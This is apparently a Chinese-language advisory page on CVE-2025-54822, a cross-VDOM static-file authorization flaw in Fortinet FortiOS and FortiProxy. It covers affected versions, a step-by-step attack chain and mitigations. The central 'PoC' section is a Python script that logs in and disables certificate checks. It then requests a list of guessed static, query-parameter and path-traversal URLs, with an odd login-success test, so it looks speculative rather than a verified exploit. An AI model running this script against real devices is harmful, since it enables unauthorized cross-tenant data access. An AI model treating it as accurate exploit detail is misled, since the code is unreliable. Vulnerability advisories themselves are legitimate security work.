CVE-2025-54822 Fortinet FortiOS/FortiProxy 权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-54822

漏洞类型

权限绕过/不当授权 (Improper Authorization, CWE-285)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiOS、Fortinet FortiProxy

漏洞概述

CVE-2025-54822是Fortinet FortiOS和FortiProxy产品中发现的一个不当授权漏洞（Improper Authorization），CWE分类为CWE-285。该漏洞由Fortinet产品安全事件响应团队（PSIRT）发现并报告，CVSS 3.1评分为4.3分，属于中危级别。

该漏洞存在于Fortinet的多款网络安全产品中，包括FortiOS 7.0、7.2、7.4等多个版本系列，以及FortiProxy 2.0、7.0、7.2、7.4等版本。FortiOS是Fortinet的核心操作系统，广泛部署于FortiGate下一代防火墙等设备中；FortiProxy则是Fortinet的Web代理产品，常用于企业网络边界防护。

该漏洞的根本原因在于产品对虚拟域（VDOM，Virtual Domain）之间的静态文件访问控制存在缺陷。VDOM是Fortinet设备中用于实现多租户隔离的功能，允许在同一台物理设备上划分多个独立的虚拟防火墙实例。在正常情况下，不同VDOM之间应当严格隔离，用户无法跨VDOM访问资源。然而，由于该授权缺陷，经过身份验证的攻击者可以通过精心构造的HTTP或HTTPS请求，绕过VDOM隔离机制，访问其他VDOM中的静态文件。

虽然该漏洞需要攻击者具备有效的认证凭据（低权限要求），且不会直接导致完整性或可用性受损，但其机密性影响为低级别，意味着攻击者可以读取其他VDOM中存储的敏感静态文件，可能导致跨租户数据泄露，对多租户环境的安全性构成威胁。该漏洞于2025年10月14日正式披露，Fortinet已发布相应的安全公告（FG-IR-25-684）。

技术细节

该漏洞属于不当授权（Improper Authorization，CWE-285）类别，核心问题在于FortiOS和FortiProxy的VDOM（Virtual Domain）间静态文件访问控制机制存在缺陷。

**漏洞原理：**
在Fortinet设备中，VDOM用于实现虚拟化多租户隔离，每个VDOM拥有独立的配置、管理界面和文件系统。正常情况下，当用户通过HTTP/HTTPS请求访问设备资源时，系统应当根据用户的认证上下文和所属VDOM进行严格的访问控制，确保用户只能访问其所属VDOM内的资源。

然而，由于授权验证逻辑存在缺陷，设备未能正确验证请求所针对的VDOM上下文与用户所属VDOM的一致性。攻击者可以在HTTP/HTTPS请求中通过特定方式（如修改请求路径、添加特殊参数或利用路径遍历等方式）指定目标VDOM，绕过授权检查，从而访问其他VDOM中的静态文件资源。

**利用方式：**
1. 攻击者首先需要获取有效的认证凭据（任意低权限账户即可），登录目标FortiGate/FortiProxy设备；
2. 利用已认证的会话，构造特殊的HTTP或HTTPS请求，在请求中指定目标VDOM的标识或路径；
3. 由于授权缺陷，服务器未正确校验请求者与目标VDOM的归属关系，直接返回目标VDOM中的静态文件内容；
4. 攻击者可重复此过程，遍历并下载其他VDOM中的敏感静态文件。

**影响范围：**
该漏洞影响FortiOS 7.0.0-7.0.11、7.2.0-7.2.8、7.4.0-7.4.1，以及FortiProxy 2.0全版本、7.0全版本、7.2全版本、7.4.0-7.4.8。攻击复杂度低（AC:L），通过网络即可利用（AV:N），无需用户交互（UI:N），但需要低权限认证（PR:L）。

攻击链分析

STEP 1

步骤1：获取认证凭据

攻击者通过钓鱼、社会工程或其他方式获取FortiGate/FortiProxy设备的有效低权限账户凭据，获得设备的合法访问权限。

STEP 2

步骤2：建立认证会话

使用获取的凭据登录目标Fortinet设备，建立有效的HTTP/HTTPS认证会话，获取会话Cookie。

STEP 3

步骤3：探测VDOM信息

通过已认证会话探测设备上存在的VDOM列表，识别目标VDOM（如root或其他租户VDOM）。

STEP 4

步骤4：构造恶意请求

精心构造HTTP/HTTPS请求，在请求路径或参数中指定目标VDOM的标识，绕过VDOM间的授权检查机制。

STEP 5

步骤5：跨VDOM访问静态文件

发送构造的请求，由于不当授权漏洞，服务器返回目标VDOM中的静态文件内容，实现跨VDOM数据访问。

STEP 6

步骤6：数据收集与利用

重复上述过程，批量下载目标VDOM中的敏感静态文件，可能包含配置信息、证书、脚本等敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54822 - Fortinet FortiOS/FortiProxy VDOM Static File Access PoC
# Vulnerability: Improper Authorization (CWE-285) - Cross-VDOM static file access
# Author: Security Researcher
# Note: Requires valid low-privilege authenticated session

import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_HOST = "https://<target-fortigate-ip>"
USERNAME = "low_privilege_user"
PASSWORD = "password123"
TARGET_VDOM = "root"  # Target VDOM to access (e.g., "root", "vdom1", etc.)

session = requests.Session()
session.verify = False

# Step 1: Authenticate to the FortiGate device
login_url = f"{TARGET_HOST}/logincheck"
login_data = {
    "username": USERNAME,
    "secretkey": PASSWORD
}

response = session.post(login_url, data=login_data)
if response.status_code == 200 and "FORTINET" not in response.text:
    print("[+] Authentication successful")
else:
    print("[-] Authentication failed")
    exit(1)

# Step 2: Exploit VDOM static file access via crafted HTTP request
# The vulnerability allows accessing static files of other VDOMs
# by manipulating the request path or VDOM context

# Method 1: Direct path manipulation to target VDOM static files
exploit_urls = [
    f"{TARGET_HOST}/static/{TARGET_VDOM}/css/style.css",
    f"{TARGET_HOST}/static/{TARGET_VDOM}/js/main.js",
    f"{TARGET_HOST}/favicon.ico?vdom={TARGET_VDOM}",
    f"{TARGET_HOST}/{TARGET_VDOM}/static/../static/config.txt",
    f"{TARGET_HOST}/ng/fortiview/../static/{TARGET_VDOM}/index.html",
]

for url in exploit_urls:
    try:
        resp = session.get(url, timeout=10)
        if resp.status_code == 200 and len(resp.content) > 0:
            print(f"[+] Successfully accessed: {url}")
            print(f"    Content-Length: {len(resp.content)}")
            print(f"    Preview: {resp.text[:200]}")
        else:
            print(f"[-] Access denied or empty: {url} (Status: {resp.status_code})")
    except Exception as e:
        print(f"[-] Error accessing {url}: {e}")

# Method 2: Using curl equivalent
# curl -k -b "APISESSIONID=<session_cookie>" \
#   "https://<target>/static/<target_vdom>/path/to/static/file"

print("\n[*] PoC execution completed")

影响范围

FortiOS 7.4.0 - 7.4.1

FortiOS 7.2.0 - 7.2.8

FortiOS 7.0.0 - 7.0.11

FortiProxy 7.4.0 - 7.4.8

FortiProxy 7.2 全版本

FortiProxy 7.0 全版本

FortiProxy 2.0 全版本

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）审查并限制所有用户账户的权限，确保仅授予必要的最低权限；2）启用管理访问的IP白名单，限制只有可信IP地址可以访问设备管理界面；3）监控和审计所有HTTP/HTTPS访问日志，重点关注异常的VDOM访问请求；4）如非必要，禁用多VDOM功能或减少VDOM数量以缩小攻击面；5）定期轮换管理账户密码，防止凭据泄露；6）部署网络层面的访问控制，限制对FortiGate/FortiProxy管理端口的访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-54822
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-54822
3 Details https://www.cvedetails.com/cve/CVE-2025-54822/
4 VulDB https://vuldb.com/cve/CVE-2025-54822
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-25-684